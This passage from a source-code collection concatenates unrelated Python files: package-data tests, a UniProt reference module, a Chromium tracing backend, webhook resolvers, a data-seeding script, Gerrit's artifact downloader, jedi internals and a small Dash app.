os.path.join('resources', 'fizz.txt'),
os.path.join('resources', 'buzz.txt')
}
assert set(data['baz']) == {'data.bin', 'data'}
def test_whole_package_data_is_included(self):
data = find_packages_data(
include=('foo', 'foo.*'))
assert set(data) == {'foo', 'foo.bar'}
assert set(data['foo']) == {'data', 'data.txt'}
assert set(data['foo.bar']) == {
'data.txt',
os.path.join('resources', 'fizz.txt'),
os.path.join('resources', 'buzz.txt')
}
def test_whole_package_data_is_excluded(self):
data = find_packages_data(
include=('foo', 'foo.*'),
exclude=('foo.bar',))
assert set(data) == {'foo'}
assert set(data['foo']) == {'data', 'data.txt'}
def test_partial_package_data_is_excluded(self):
data = find_packages_data(
include=('foo', 'foo.*'),
exclude={'foo.bar': ['resources/*']})
assert set(data) == {'foo', 'foo.bar'}
assert set(data['foo']) == {'data', 'data.txt'}
assert set(data['foo.bar']) == {'data.txt'}
def test_partial_package_data_is_included(self):
data = find_packages_data(
include={
'foo': ['*.txt'],
'foo.*': ['resources/*.txt']
},
)
assert set(data) == {'foo', 'foo.bar'}
assert set(data['foo']) == {'data.txt'}
assert set(data['foo.bar']) == {
os.path.join('resources', 'fizz.txt'),
os.path.join('resources', 'buzz.txt')
}
def test_nested_packages_data_is_found(self):
data = find_packages_data(where='nested/pkgs')
assert set(data) == {'fizz', 'fizz.buzz'}
assert set(data['fizz']) == {
os.path.join('data', 'buzz.bin')
}
assert set(data['fizz.buzz']) == {'data.txt'}
if __name__ == '__main__':
unittest.main()
|
the-stack_0_1538 | """Classes for providing extra information about an :class:`ihm.Entity`"""
# Handle different naming of urllib in Python 2/3
try:
import urllib.request as urllib2
except ImportError:
import urllib2
import sys
class Reference(object):
"""Base class for extra information about an :class:`ihm.Entity`.
This class is not used directly; instead, use a subclass such as
:class:`Sequence` or :class:`UniProtSequence`. These objects are
then typically passed to the :class:`ihm.Entity` constructor."""
pass
class Sequence(Reference):
"""Point to the sequence of an :class:`ihm.Entity` in a sequence database;
convenience subclasses are provided for common sequence databases such
as :class:`UniProtSequence`.
These objects are typically passed to the :class:`ihm.Entity`
constructor.
See also :attr:`alignments` to describe the correspondence between
the database and entity sequences.
:param str db_name: The name of the database.
:param str db_code: The name of the sequence in the database.
:param str accession: The database accession.
:param str sequence: The complete sequence, as a string of
one-letter codes.
:param str details: Longer text describing the sequence.
"""
def __init__(self, db_name, db_code, accession, sequence, details=None):
self.db_name, self.db_code, self.accession = db_name, db_code, accession
self.sequence, self.details = sequence, details
#: All alignments between the reference and entity sequences, as
#: :class:`Alignment` objects. If none are provided, a simple 1:1
#: alignment is assumed.
self.alignments = []
def _get_alignments(self):
if self.alignments:
return self.alignments
elif not hasattr(self, '_default_alignment'):
self._default_alignment = Alignment()
return [self._default_alignment]
class UniProtSequence(Sequence):
"""Point to the sequence of an :class:`ihm.Entity` in UniProt.
These objects are typically passed to the :class:`ihm.Entity`
constructor.
:param str db_code: The UniProt name (e.g. NUP84_YEAST)
:param str accession: The UniProt accession (e.g. P52891)
See :class:`Sequence` for a description of the remaining parameters.
"""
_db_name = 'UNP'
def __init__(self, db_code, accession, sequence, details=None):
super(UniProtSequence, self).__init__(
self._db_name, db_code, accession, sequence, details)
def __str__(self):
return "<ihm.reference.UniProtSequence(%s)>" % self.accession
@classmethod
def from_accession(cls, accession):
"""Create :class:`UniProtSequence` from just an accession.
This is done by querying the UniProt web API, so requires network
access.
:param str accession: The UniProt accession (e.g. P52891)
"""
# urlopen returns bytes
if sys.version_info[0] >= 3:
def decode(t):
return t.decode('ascii')
else:
decode = lambda t: t
url = 'https://www.uniprot.org/uniprot/%s.fasta' % accession
with urllib2.urlopen(url) as fh:
header = decode(fh.readline())
spl = header.split('|')
if len(spl) < 3 or spl[0] != '>sp':
raise ValueError("Cannot parse UniProt header %s" % header)
cd = spl[2].split(None, 1)
code = cd[0]
details = cd[1].rstrip('\r\n') if len(cd) > 1 else None
seq = decode(fh.read()).replace('\n', '')
return cls(code, accession, seq, details)
class Alignment(object):
"""A sequence range that aligns between the database and the entity.
This describes part of the sequence in the sequence database
(:class:`Sequence`) and in the :class:`ihm.Entity`. The two ranges
must be the same length and have the same primary sequence (any
differences must be described with :class:`SeqDif` objects).
:param int db_begin: The first residue in the database sequence
that is used (defaults to the entire sequence).
:param int db_end: The last residue in the database sequence
that is used (or None, the default, to use the entire sequence).
:param int entity_begin: The first residue in the :class:`~ihm.Entity`
sequence that is taken from the reference (defaults to the entire
entity sequence).
:param int entity_end: The last residue in the :class:`~ihm.Entity`
sequence that is taken from the reference (or None, the default,
to use the entire sequence).
:param seq_dif: Single-point mutations made to the sequence.
:type seq_dif: Sequence of :class:`SeqDif` objects.
"""
def __init__(self, db_begin=1, db_end=None, entity_begin=1,
entity_end=None, seq_dif=[]):
self.db_begin, self.db_end = db_begin, db_end
self.entity_begin, self.entity_end = entity_begin, entity_end
self.seq_dif = []
self.seq_dif.extend(seq_dif)
class SeqDif(object):
"""Annotate a sequence difference between a reference and entity sequence.
See :class:`Alignment`.
:param int seq_id: The residue index in the entity sequence.
:param db_monomer: The monomer type (as a :class:`~ihm.ChemComp` object)
in the reference sequence.
:type db_monomer: :class:`ihm.ChemComp`
:param monomer: The monomer type (as a :class:`~ihm.ChemComp` object)
in the entity sequence.
:type monomer: :class:`ihm.ChemComp`
:param str details: Descriptive text for the sequence difference.
"""
def __init__(self, seq_id, db_monomer, monomer, details=None):
self.seq_id, self.db_monomer, self.monomer = seq_id, db_monomer, monomer
self.details = details
|
the-stack_0_1539 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import logging
import socket
import time
import traceback
from telemetry import decorators
from telemetry.internal.backends.chrome_inspector import inspector_websocket
from telemetry.internal.backends.chrome_inspector import websocket
from tracing.trace_data import trace_data as trace_data_module
class TracingUnsupportedException(Exception):
pass
class TracingTimeoutException(Exception):
pass
class TracingUnrecoverableException(Exception):
pass
class TracingHasNotRunException(Exception):
pass
class TracingUnexpectedResponseException(Exception):
pass
class ClockSyncResponseException(Exception):
pass
class _DevToolsStreamReader(object):
def __init__(self, inspector_socket, stream_handle):
self._inspector_websocket = inspector_socket
self._handle = stream_handle
self._trace_file_handle = None
self._callback = None
def Read(self, callback):
# Do not allow the instance of this class to be reused, as
# we only read data sequentially at the moment, so a stream
# can only be read once.
assert not self._callback
self._trace_file_handle = trace_data_module.TraceFileHandle()
self._trace_file_handle.Open()
self._callback = callback
self._ReadChunkFromStream()
# The below is not a typo -- queue one extra read ahead to avoid latency.
self._ReadChunkFromStream()
def _ReadChunkFromStream(self):
# Limit max block size to avoid fragmenting memory in sock.recv(),
# (see https://github.com/liris/websocket-client/issues/163 for details)
req = {'method': 'IO.read', 'params': {
'handle': self._handle, 'size': 32768}}
self._inspector_websocket.AsyncRequest(req, self._GotChunkFromStream)
def _GotChunkFromStream(self, response):
# Quietly discard responses from reads queued ahead after EOF.
if self._trace_file_handle is None:
return
if 'error' in response:
raise TracingUnrecoverableException(
'Reading trace failed: %s' % response['error']['message'])
result = response['result']
# Convert the trace data that's receive as UTF32 to its native encoding of
# UTF8 in order to reduce its size.
self._trace_file_handle.AppendTraceData(result['data'].encode('utf8'))
if not result.get('eof', False):
self._ReadChunkFromStream()
return
req = {'method': 'IO.close', 'params': {'handle': self._handle}}
self._inspector_websocket.SendAndIgnoreResponse(req)
self._trace_file_handle.Close()
self._callback(self._trace_file_handle)
self._trace_file_handle = None
class TracingBackend(object):
_TRACING_DOMAIN = 'Tracing'
def __init__(self, inspector_socket, is_tracing_running=False,
support_modern_devtools_tracing_start_api=False):
self._inspector_websocket = inspector_socket
self._inspector_websocket.RegisterDomain(
self._TRACING_DOMAIN, self._NotificationHandler)
self._is_tracing_running = is_tracing_running
self._start_issued = False
self._can_collect_data = False
self._has_received_all_tracing_data = False
self._support_modern_devtools_tracing_start_api = (
support_modern_devtools_tracing_start_api)
self._trace_data_builder = None
@property
def is_tracing_running(self):
return self._is_tracing_running
def StartTracing(self, chrome_trace_config, timeout=10):
"""When first called, starts tracing, and returns True.
If called during tracing, tracing is unchanged, and it returns False.
"""
if self.is_tracing_running:
return False
assert not self._can_collect_data, 'Data not collected from last trace.'
# Reset collected tracing data from previous tracing calls.
if not self.IsTracingSupported():
raise TracingUnsupportedException(
'Chrome tracing not supported for this app.')
params = {'transferMode': 'ReturnAsStream'}
if self._support_modern_devtools_tracing_start_api:
params['traceConfig'] = (
chrome_trace_config.GetChromeTraceConfigForDevTools())
else:
if chrome_trace_config.requires_modern_devtools_tracing_start_api:
raise TracingUnsupportedException(
'Trace options require modern Tracing.start DevTools API, '
'which is NOT supported by the browser')
params['categories'], params['options'] = (
chrome_trace_config.GetChromeTraceCategoriesAndOptionsForDevTools())
req = {'method': 'Tracing.start', 'params': params}
logging.info('Start Tracing Request: %r', req)
response = self._inspector_websocket.SyncRequest(req, timeout)
if 'error' in response:
raise TracingUnexpectedResponseException(
'Inspector returned unexpected response for '
'Tracing.start:\n' + json.dumps(response, indent=2))
self._is_tracing_running = True
self._start_issued = True
return True
def RecordClockSyncMarker(self, sync_id):
assert self.is_tracing_running, 'Tracing must be running to clock sync.'
req = {
'method': 'Tracing.recordClockSyncMarker',
'params': {
'syncId': sync_id
}
}
rc = self._inspector_websocket.SyncRequest(req, timeout=2)
if 'error' in rc:
raise ClockSyncResponseException(rc['error']['message'])
def StopTracing(self):
"""Stops tracing and pushes results to the supplied TraceDataBuilder.
If this is called after tracing has been stopped, trace data from the last
tracing run is pushed.
"""
if not self.is_tracing_running:
raise TracingHasNotRunException()
else:
if not self._start_issued:
# Tracing is running but start was not issued so, startup tracing must
# be in effect. Issue another Tracing.start to update the transfer mode.
# TODO(caseq): get rid of it when streaming is the default.
params = {
'transferMode': 'ReturnAsStream',
'traceConfig': {}
}
req = {'method': 'Tracing.start', 'params': params}
self._inspector_websocket.SendAndIgnoreResponse(req)
req = {'method': 'Tracing.end'}
self._inspector_websocket.SendAndIgnoreResponse(req)
self._is_tracing_running = False
self._start_issued = False
self._can_collect_data = True
def DumpMemory(self, timeout=30):
"""Dumps memory.
Returns:
GUID of the generated dump if successful, None otherwise.
Raises:
TracingTimeoutException: If more than |timeout| seconds has passed
since the last time any data is received.
TracingUnrecoverableException: If there is a websocket error.
TracingUnexpectedResponseException: If the response contains an error
or does not contain the expected result.
"""
request = {
'method': 'Tracing.requestMemoryDump'
}
try:
response = self._inspector_websocket.SyncRequest(request, timeout)
except websocket.WebSocketTimeoutException:
raise TracingTimeoutException(
'Exception raised while sending a Tracing.requestMemoryDump '
'request:\n' + traceback.format_exc())
except (socket.error, websocket.WebSocketException,
inspector_websocket.WebSocketDisconnected):
raise TracingUnrecoverableException(
'Exception raised while sending a Tracing.requestMemoryDump '
'request:\n' + traceback.format_exc())
if ('error' in response or
'result' not in response or
'success' not in response['result'] or
'dumpGuid' not in response['result']):
raise TracingUnexpectedResponseException(
'Inspector returned unexpected response for '
'Tracing.requestMemoryDump:\n' + json.dumps(response, indent=2))
result = response['result']
return result['dumpGuid'] if result['success'] else None
def CollectTraceData(self, trace_data_builder, timeout=60):
if not self._can_collect_data:
raise Exception('Cannot collect before tracing is finished.')
self._CollectTracingData(trace_data_builder, timeout)
self._can_collect_data = False
def _CollectTracingData(self, trace_data_builder, timeout):
"""Collects tracing data. Assumes that Tracing.end has already been sent.
Args:
trace_data_builder: An instance of TraceDataBuilder to put results into.
timeout: The timeout in seconds.
Raises:
TracingTimeoutException: If more than |timeout| seconds has passed
since the last time any data is received.
TracingUnrecoverableException: If there is a websocket error.
"""
self._has_received_all_tracing_data = False
start_time = time.time()
self._trace_data_builder = trace_data_builder
try:
while True:
try:
self._inspector_websocket.DispatchNotifications(timeout)
start_time = time.time()
except websocket.WebSocketTimeoutException:
pass
except (socket.error, websocket.WebSocketException):
raise TracingUnrecoverableException(
'Exception raised while collecting tracing data:\n' +
traceback.format_exc())
if self._has_received_all_tracing_data:
break
elapsed_time = time.time() - start_time
if elapsed_time > timeout:
raise TracingTimeoutException(
'Only received partial trace data due to timeout after %s '
'seconds. If the trace data is big, you may want to increase '
'the timeout amount.' % elapsed_time)
finally:
self._trace_data_builder = None
def _NotificationHandler(self, res):
if 'Tracing.dataCollected' == res.get('method'):
value = res.get('params', {}).get('value')
self._trace_data_builder.AddTraceFor(
trace_data_module.CHROME_TRACE_PART, value)
elif 'Tracing.tracingComplete' == res.get('method'):
stream_handle = res.get('params', {}).get('stream')
if not stream_handle:
self._has_received_all_tracing_data = True
return
reader = _DevToolsStreamReader(self._inspector_websocket, stream_handle)
reader.Read(self._ReceivedAllTraceDataFromStream)
def _ReceivedAllTraceDataFromStream(self, trace_handle):
self._trace_data_builder.AddTraceFor(
trace_data_module.CHROME_TRACE_PART, trace_handle)
self._has_received_all_tracing_data = True
def Close(self):
self._inspector_websocket.UnregisterDomain(self._TRACING_DOMAIN)
self._inspector_websocket = None
@decorators.Cache
def IsTracingSupported(self):
req = {'method': 'Tracing.hasCompleted'}
res = self._inspector_websocket.SyncRequest(req, timeout=10)
return not res.get('response')
|
the-stack_0_1540 | import graphene
from graphql_jwt.exceptions import PermissionDenied
from ...core.permissions import WebhookPermissions
from ...webhook import models, payloads
from ...webhook.event_types import WebhookEventType
from ..utils import sort_queryset
from .sorters import WebhookSortField
from .types import Webhook, WebhookEvent
def resolve_webhooks(info, sort_by=None, **_kwargs):
service_account = info.context.service_account
if service_account:
qs = models.Webhook.objects.filter(service_account=service_account)
else:
user = info.context.user
if not user.has_perm(WebhookPermissions.MANAGE_WEBHOOKS):
raise PermissionDenied()
qs = models.Webhook.objects.all()
return sort_queryset(qs, sort_by, WebhookSortField)
def resolve_webhook(info, webhook_id):
service_account = info.context.service_account
if service_account:
_, webhook_id = graphene.Node.from_global_id(webhook_id)
return service_account.webhooks.filter(id=webhook_id).first()
user = info.context.user
if user.has_perm(WebhookPermissions.MANAGE_WEBHOOKS):
return graphene.Node.get_node_from_global_id(info, webhook_id, Webhook)
raise PermissionDenied()
def resolve_webhook_events():
return [
WebhookEvent(event_type=event_type[0])
for event_type in WebhookEventType.CHOICES
]
def resolve_sample_payload(info, event_name):
service_account = info.context.service_account
required_permission = WebhookEventType.PERMISSIONS.get(event_name)
if required_permission:
if service_account and service_account.has_perm(required_permission):
return payloads.generate_sample_payload(event_name)
if info.context.user.has_perm(required_permission):
return payloads.generate_sample_payload(event_name)
raise PermissionDenied()
|
the-stack_0_1541 | import factory
USERS = 1000
GROUPS = 5
EVENTS = 5
NOTIFICATIONS = 5000
OCCURENCES = 2000
AUDITLOGS = 1000
if __name__ == '__main__': # noqa: C901
import os
import random
from django.core.wsgi import get_wsgi_application
os.environ['DJANGO_SETTINGS_MODULE'] = 'bitcaster.config.settings'
application = get_wsgi_application()
from bitcaster.models import Organization, Subscription, Notification, Event
from bitcaster.utils.tests import factories
org = Organization.objects.first()
app = factories.ApplicationFactory(organization=org, name='Dummy1')
users = []
for i in range(0, USERS):
print('.', end='')
user = factories.UserFactory(email='user%[email protected]' % i)
org_member = factories.OrganizationMemberFactory(organization=org, user=user)
users.append(org_member)
factories.ApplicationMemberFactory(application=app, org_member=org_member)
assert Organization.objects.count() == 1
if not users:
users = list(org.memberships.all())
channels = list(org.channels.all())
for i in range(0, GROUPS):
group = factories.OrganizationGroupFactory(organization=org, name='Group-%s' % i)
assert Organization.objects.count() == 1
if not group.members.exists():
members = random.sample(users, random.randint(5, 15))
for m in members:
group.members.add(m)
for i in range(0, EVENTS):
event = factories.EventFactory(application=app, enabled=True, name='Event-%s' % i)
assert Organization.objects.count() == 1
chs = random.sample(channels, random.randint(1, 5))
for ch in chs:
event.channels.add(ch)
factories.MessageFactory(event=event,
channel=ch, body='test')
members = random.sample(users, random.randint(5, 300))
for m in members:
ch = random.choice(chs)
factories.AddressFactory(user=m.user, address='123')
assert Organization.objects.count() == 1
factories.SubscriptionFactory(subscriber=m.user,
trigger_by=m.user,
channel=ch,
event=event)
assert Organization.objects.count() == 1
fld = Notification._meta.get_field('timestamp')
fld.auto_now_add = False
Notification.timestamp.auto_now_add = False
events = list(app.events.all())
subscriptions = list(Subscription.objects.filter(event__application=app))
# Notification Log
for i in range(NOTIFICATIONS):
subscription = random.choice(subscriptions)
factories.NotificationFactory(id=i,
application=app,
event=subscription.event,
subscription=subscription,
channel=subscription.channel)
assert Organization.objects.count() == 1
# Notification Log
for i in range(OCCURENCES):
factories.OccurenceFactory(id=i,
organization=org,
application=app,
event=factory.LazyAttribute(lambda a: Event.objects.order_by('?').first()))
# Audit Log
for i in range(AUDITLOGS):
e = factories.AuditLogEntryFactory(id=i,
organization=org,
)
|
the-stack_0_1543 | #!/usr/bin/env python
# Copyright (C) 2013 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
from hashlib import sha1
from optparse import OptionParser
from os import link, makedirs, path, remove
import shutil
from subprocess import check_call, CalledProcessError
from sys import stderr
from util import hash_file, resolve_url
from zipfile import ZipFile, BadZipfile, LargeZipFile
GERRIT_HOME = path.expanduser('~/.gerritcodereview')
# TODO(davido): Rename in bazel-cache
CACHE_DIR = path.join(GERRIT_HOME, 'buck-cache', 'downloaded-artifacts')
LOCAL_PROPERTIES = 'local.properties'
def safe_mkdirs(d):
if path.isdir(d):
return
try:
makedirs(d)
except OSError as err:
if not path.isdir(d):
raise err
def download_properties(root_dir):
""" Get the download properties.
First tries to find the properties file in the given root directory,
and if not found there, tries in the Gerrit settings folder in the
user's home directory.
Returns a set of download properties, which may be empty.
"""
p = {}
local_prop = path.join(root_dir, LOCAL_PROPERTIES)
if not path.isfile(local_prop):
local_prop = path.join(GERRIT_HOME, LOCAL_PROPERTIES)
if path.isfile(local_prop):
try:
with open(local_prop) as fd:
for line in fd:
if line.startswith('download.'):
d = [e.strip() for e in line.split('=', 1)]
name, url = d[0], d[1]
p[name[len('download.'):]] = url
except OSError:
pass
return p
def cache_entry(args):
if args.v:
h = args.v
else:
h = sha1(args.u.encode('utf-8')).hexdigest()
name = '%s-%s' % (path.basename(args.o), h)
return path.join(CACHE_DIR, name)
opts = OptionParser()
opts.add_option('-o', help='local output file')
opts.add_option('-u', help='URL to download')
opts.add_option('-v', help='expected content SHA-1')
opts.add_option('-x', action='append', help='file to delete from ZIP')
opts.add_option('--exclude_java_sources', action='store_true')
opts.add_option('--unsign', action='store_true')
args, _ = opts.parse_args()
root_dir = args.o
while root_dir and path.dirname(root_dir) != root_dir:
root_dir, n = path.split(root_dir)
if n == 'WORKSPACE':
break
redirects = download_properties(root_dir)
cache_ent = cache_entry(args)
src_url = resolve_url(args.u, redirects)
if not path.exists(cache_ent):
try:
safe_mkdirs(path.dirname(cache_ent))
except OSError as err:
print('error creating directory %s: %s' %
(path.dirname(cache_ent), err), file=stderr)
exit(1)
print('Download %s' % src_url, file=stderr)
try:
check_call(['curl', '--proxy-anyauth', '-ksSfLo', cache_ent, src_url])
except OSError as err:
print('could not invoke curl: %s\nis curl installed?' % err, file=stderr)
exit(1)
except CalledProcessError as err:
print('error using curl: %s' % err, file=stderr)
exit(1)
if args.v:
have = hash_file(sha1(), cache_ent).hexdigest()
if args.v != have:
print((
'%s:\n' +
'expected %s\n' +
'received %s\n') % (src_url, args.v, have), file=stderr)
try:
remove(cache_ent)
except OSError as err:
if path.exists(cache_ent):
print('error removing %s: %s' % (cache_ent, err), file=stderr)
exit(1)
exclude = []
if args.x:
exclude += args.x
if args.exclude_java_sources:
try:
with ZipFile(cache_ent, 'r') as zf:
for n in zf.namelist():
if n.endswith('.java'):
exclude.append(n)
except (BadZipfile, LargeZipFile) as err:
print('error opening %s: %s' % (cache_ent, err), file=stderr)
exit(1)
if args.unsign:
try:
with ZipFile(cache_ent, 'r') as zf:
for n in zf.namelist():
if (n.endswith('.RSA')
or n.endswith('.SF')
or n.endswith('.LIST')):
exclude.append(n)
except (BadZipfile, LargeZipFile) as err:
print('error opening %s: %s' % (cache_ent, err), file=stderr)
exit(1)
safe_mkdirs(path.dirname(args.o))
if exclude:
try:
shutil.copyfile(cache_ent, args.o)
except (shutil.Error, IOError) as err:
print('error copying to %s: %s' % (args.o, err), file=stderr)
exit(1)
try:
check_call(['zip', '-d', args.o] + exclude)
except CalledProcessError as err:
print('error removing files from zip: %s' % err, file=stderr)
exit(1)
else:
try:
link(cache_ent, args.o)
except OSError as err:
try:
shutil.copyfile(cache_ent, args.o)
except (shutil.Error, IOError) as err:
print('error copying to %s: %s' % (args.o, err), file=stderr)
exit(1)
|
the-stack_0_1546 | import re
from parso.python import tree
from jedi._compatibility import zip_longest
from jedi import debug
from jedi.evaluate import analysis
from jedi.evaluate.lazy_context import LazyKnownContext, LazyKnownContexts, \
LazyTreeContext, get_merged_lazy_context
from jedi.evaluate.filters import ParamName
from jedi.evaluate.base_context import NO_CONTEXTS
from jedi.evaluate.context import iterable
from jedi.evaluate.param import get_executed_params, ExecutedParam
def try_iter_content(types, depth=0):
"""Helper method for static analysis."""
if depth > 10:
# It's possible that a loop has references on itself (especially with
# CompiledObject). Therefore don't loop infinitely.
return
for typ in types:
try:
f = typ.py__iter__
except AttributeError:
pass
else:
for lazy_context in f():
try_iter_content(lazy_context.infer(), depth + 1)
def repack_with_argument_clinic(string, keep_arguments_param=False):
"""
Transforms a function or method with arguments to the signature that is
given as an argument clinic notation.
Argument clinic is part of CPython and used for all the functions that are
implemented in C (Python 3.7):
str.split.__text_signature__
# Results in: '($self, /, sep=None, maxsplit=-1)'
"""
clinic_args = list(_parse_argument_clinic(string))
def decorator(func):
def wrapper(*args, **kwargs):
if keep_arguments_param:
arguments = kwargs['arguments']
else:
arguments = kwargs.pop('arguments')
try:
args += tuple(_iterate_argument_clinic(arguments, clinic_args))
except ValueError:
return NO_CONTEXTS
else:
return func(*args, **kwargs)
return wrapper
return decorator
def _iterate_argument_clinic(arguments, parameters):
"""Uses a list with argument clinic information (see PEP 436)."""
iterator = arguments.unpack()
for i, (name, optional, allow_kwargs) in enumerate(parameters):
key, argument = next(iterator, (None, None))
if key is not None:
debug.warning('Keyword arguments in argument clinic are currently not supported.')
raise ValueError
if argument is None and not optional:
debug.warning('TypeError: %s expected at least %s arguments, got %s',
name, len(parameters), i)
raise ValueError
context_set = NO_CONTEXTS if argument is None else argument.infer()
if not context_set and not optional:
# For the stdlib we always want values. If we don't get them,
# that's ok, maybe something is too hard to resolve, however,
# we will not proceed with the evaluation of that function.
debug.warning('argument_clinic "%s" not resolvable.', name)
raise ValueError
yield context_set
def _parse_argument_clinic(string):
allow_kwargs = False
optional = False
while string:
# Optional arguments have to begin with a bracket. And should always be
# at the end of the arguments. This is therefore not a proper argument
# clinic implementation. `range()` for exmple allows an optional start
# value at the beginning.
match = re.match('(?:(?:(\[),? ?|, ?|)(\w+)|, ?/)\]*', string)
string = string[len(match.group(0)):]
if not match.group(2): # A slash -> allow named arguments
allow_kwargs = True
continue
optional = optional or bool(match.group(1))
word = match.group(2)
yield (word, optional, allow_kwargs)
class AbstractArguments(object):
context = None
argument_node = None
trailer = None
def eval_all(self, funcdef=None):
"""
Evaluates all arguments as a support for static analysis
(normally Jedi).
"""
for key, lazy_context in self.unpack():
types = lazy_context.infer()
try_iter_content(types)
def get_calling_nodes(self):
return []
def unpack(self, funcdef=None):
raise NotImplementedError
def get_executed_params(self, execution_context):
return get_executed_params(execution_context, self)
class AnonymousArguments(AbstractArguments):
def get_executed_params(self, execution_context):
from jedi.evaluate.dynamic import search_params
return search_params(
execution_context.evaluator,
execution_context,
execution_context.tree_node
)
def __repr__(self):
return '%s()' % self.__class__.__name__
class TreeArguments(AbstractArguments):
def __init__(self, evaluator, context, argument_node, trailer=None):
"""
The argument_node is either a parser node or a list of evaluated
objects. Those evaluated objects may be lists of evaluated objects
themselves (one list for the first argument, one for the second, etc).
:param argument_node: May be an argument_node or a list of nodes.
"""
self.argument_node = argument_node
self.context = context
self._evaluator = evaluator
self.trailer = trailer # Can be None, e.g. in a class definition.
def _split(self):
if self.argument_node is None:
return
# Allow testlist here as well for Python2's class inheritance
# definitions.
if not (self.argument_node.type in ('arglist', 'testlist') or (
# in python 3.5 **arg is an argument, not arglist
(self.argument_node.type == 'argument') and
self.argument_node.children[0] in ('*', '**'))):
yield 0, self.argument_node
return
iterator = iter(self.argument_node.children)
for child in iterator:
if child == ',':
continue
elif child in ('*', '**'):
yield len(child.value), next(iterator)
elif child.type == 'argument' and \
child.children[0] in ('*', '**'):
assert len(child.children) == 2
yield len(child.children[0].value), child.children[1]
else:
yield 0, child
def unpack(self, funcdef=None):
named_args = []
for star_count, el in self._split():
if star_count == 1:
arrays = self.context.eval_node(el)
iterators = [_iterate_star_args(self.context, a, el, funcdef)
for a in arrays]
for values in list(zip_longest(*iterators)):
# TODO zip_longest yields None, that means this would raise
# an exception?
yield None, get_merged_lazy_context(
[v for v in values if v is not None]
)
elif star_count == 2:
arrays = self.context.eval_node(el)
for dct in arrays:
for key, values in _star_star_dict(self.context, dct, el, funcdef):
yield key, values
else:
if el.type == 'argument':
c = el.children
if len(c) == 3: # Keyword argument.
named_args.append((c[0].value, LazyTreeContext(self.context, c[2]),))
else: # Generator comprehension.
# Include the brackets with the parent.
comp = iterable.GeneratorComprehension(
self._evaluator, self.context, self.argument_node.parent)
yield None, LazyKnownContext(comp)
else:
yield None, LazyTreeContext(self.context, el)
# Reordering var_args is necessary, because star args sometimes appear
# after named argument, but in the actual order it's prepended.
for named_arg in named_args:
yield named_arg
def as_tree_tuple_objects(self):
for star_count, argument in self._split():
if argument.type == 'argument':
argument, default = argument.children[::2]
else:
default = None
yield argument, default, star_count
def __repr__(self):
return '<%s: %s>' % (self.__class__.__name__, self.argument_node)
def get_calling_nodes(self):
from jedi.evaluate.dynamic import DynamicExecutedParams
old_arguments_list = []
arguments = self
while arguments not in old_arguments_list:
if not isinstance(arguments, TreeArguments):
break
old_arguments_list.append(arguments)
for name, default, star_count in reversed(list(arguments.as_tree_tuple_objects())):
if not star_count or not isinstance(name, tree.Name):
continue
names = self._evaluator.goto(arguments.context, name)
if len(names) != 1:
break
if not isinstance(names[0], ParamName):
break
param = names[0].get_param()
if isinstance(param, DynamicExecutedParams):
# For dynamic searches we don't even want to see errors.
return []
if not isinstance(param, ExecutedParam):
break
if param.var_args is None:
break
arguments = param.var_args
break
if arguments.argument_node is not None:
return [arguments.argument_node]
if arguments.trailer is not None:
return [arguments.trailer]
return []
class ValuesArguments(AbstractArguments):
def __init__(self, values_list):
self._values_list = values_list
def unpack(self, funcdef=None):
for values in self._values_list:
yield None, LazyKnownContexts(values)
def __repr__(self):
return '<%s: %s>' % (self.__class__.__name__, self._values_list)
def _iterate_star_args(context, array, input_node, funcdef=None):
try:
iter_ = array.py__iter__
except AttributeError:
if funcdef is not None:
# TODO this funcdef should not be needed.
m = "TypeError: %s() argument after * must be a sequence, not %s" \
% (funcdef.name.value, array)
analysis.add(context, 'type-error-star', input_node, message=m)
else:
for lazy_context in iter_():
yield lazy_context
def _star_star_dict(context, array, input_node, funcdef):
from jedi.evaluate.context.instance import CompiledInstance
if isinstance(array, CompiledInstance) and array.name.string_name == 'dict':
# For now ignore this case. In the future add proper iterators and just
# make one call without crazy isinstance checks.
return {}
elif isinstance(array, iterable.Sequence) and array.array_type == 'dict':
return array.exact_key_items()
else:
if funcdef is not None:
m = "TypeError: %s argument after ** must be a mapping, not %s" \
% (funcdef.name.value, array)
analysis.add(context, 'type-error-star-star', input_node, message=m)
return {}
|
the-stack_0_1547 | import json
class PEXEL:
def __init__(self, annotations_file):
print("Loading captions from pexels dataset ...")
self.annotations_file = annotations_file
self.dataset = dict()
self.anns = dict()
if not annotations_file == None:
self.dataset = json.load(open(annotations_file, 'r'))
self.createIndex()
def createIndex(self):
anns = {}
for entry in self.dataset:
anns[int(entry['_id'])] = entry['annotation']
self.anns = anns
print('pexels: loaded {} captions'.format(len(anns)))
def getImgPath(self, id):
return 'img_{}.jpg'.format(id)
|
the-stack_0_1552 | import os
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
from app import app, server
style = {'maxWidth': '960px', 'margin': 'auto'}
app.layout = html.Div([
dcc.Tabs(id='tabs', value='tab-intro', children=[
dcc.Tab(label='Intro', value='tab-intro'),
dcc.Tab(label='Examples', value='tab-examples'),
dcc.Tab(label='Map', value='tab-map')
]),
html.Div(id='tabs-content')
], style=style)
from tabs import intro, map, examples
@app.callback(Output('tabs-content', 'children'),
[Input('tabs', 'value')])
def render_content(tab):
if tab == 'tab-intro': return intro.layout
elif tab == 'tab-examples': return examples.layout
elif tab == 'tab-map': return map.layout
if __name__ == '__main__':
app.run_server(debug=True) |
the-stack_0_1554 | #!/usr/bin/env python
#
# Copyright 2007 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Tests for google.appengine.runtime.context."""
import os
from unittest import mock
from google.appengine.runtime import context
from google.appengine.runtime.context import ctx_test_util
from absl.testing import absltest
@ctx_test_util.isolated_context
class ContextTest(absltest.TestCase):
def setUp(self):
super().setUp()
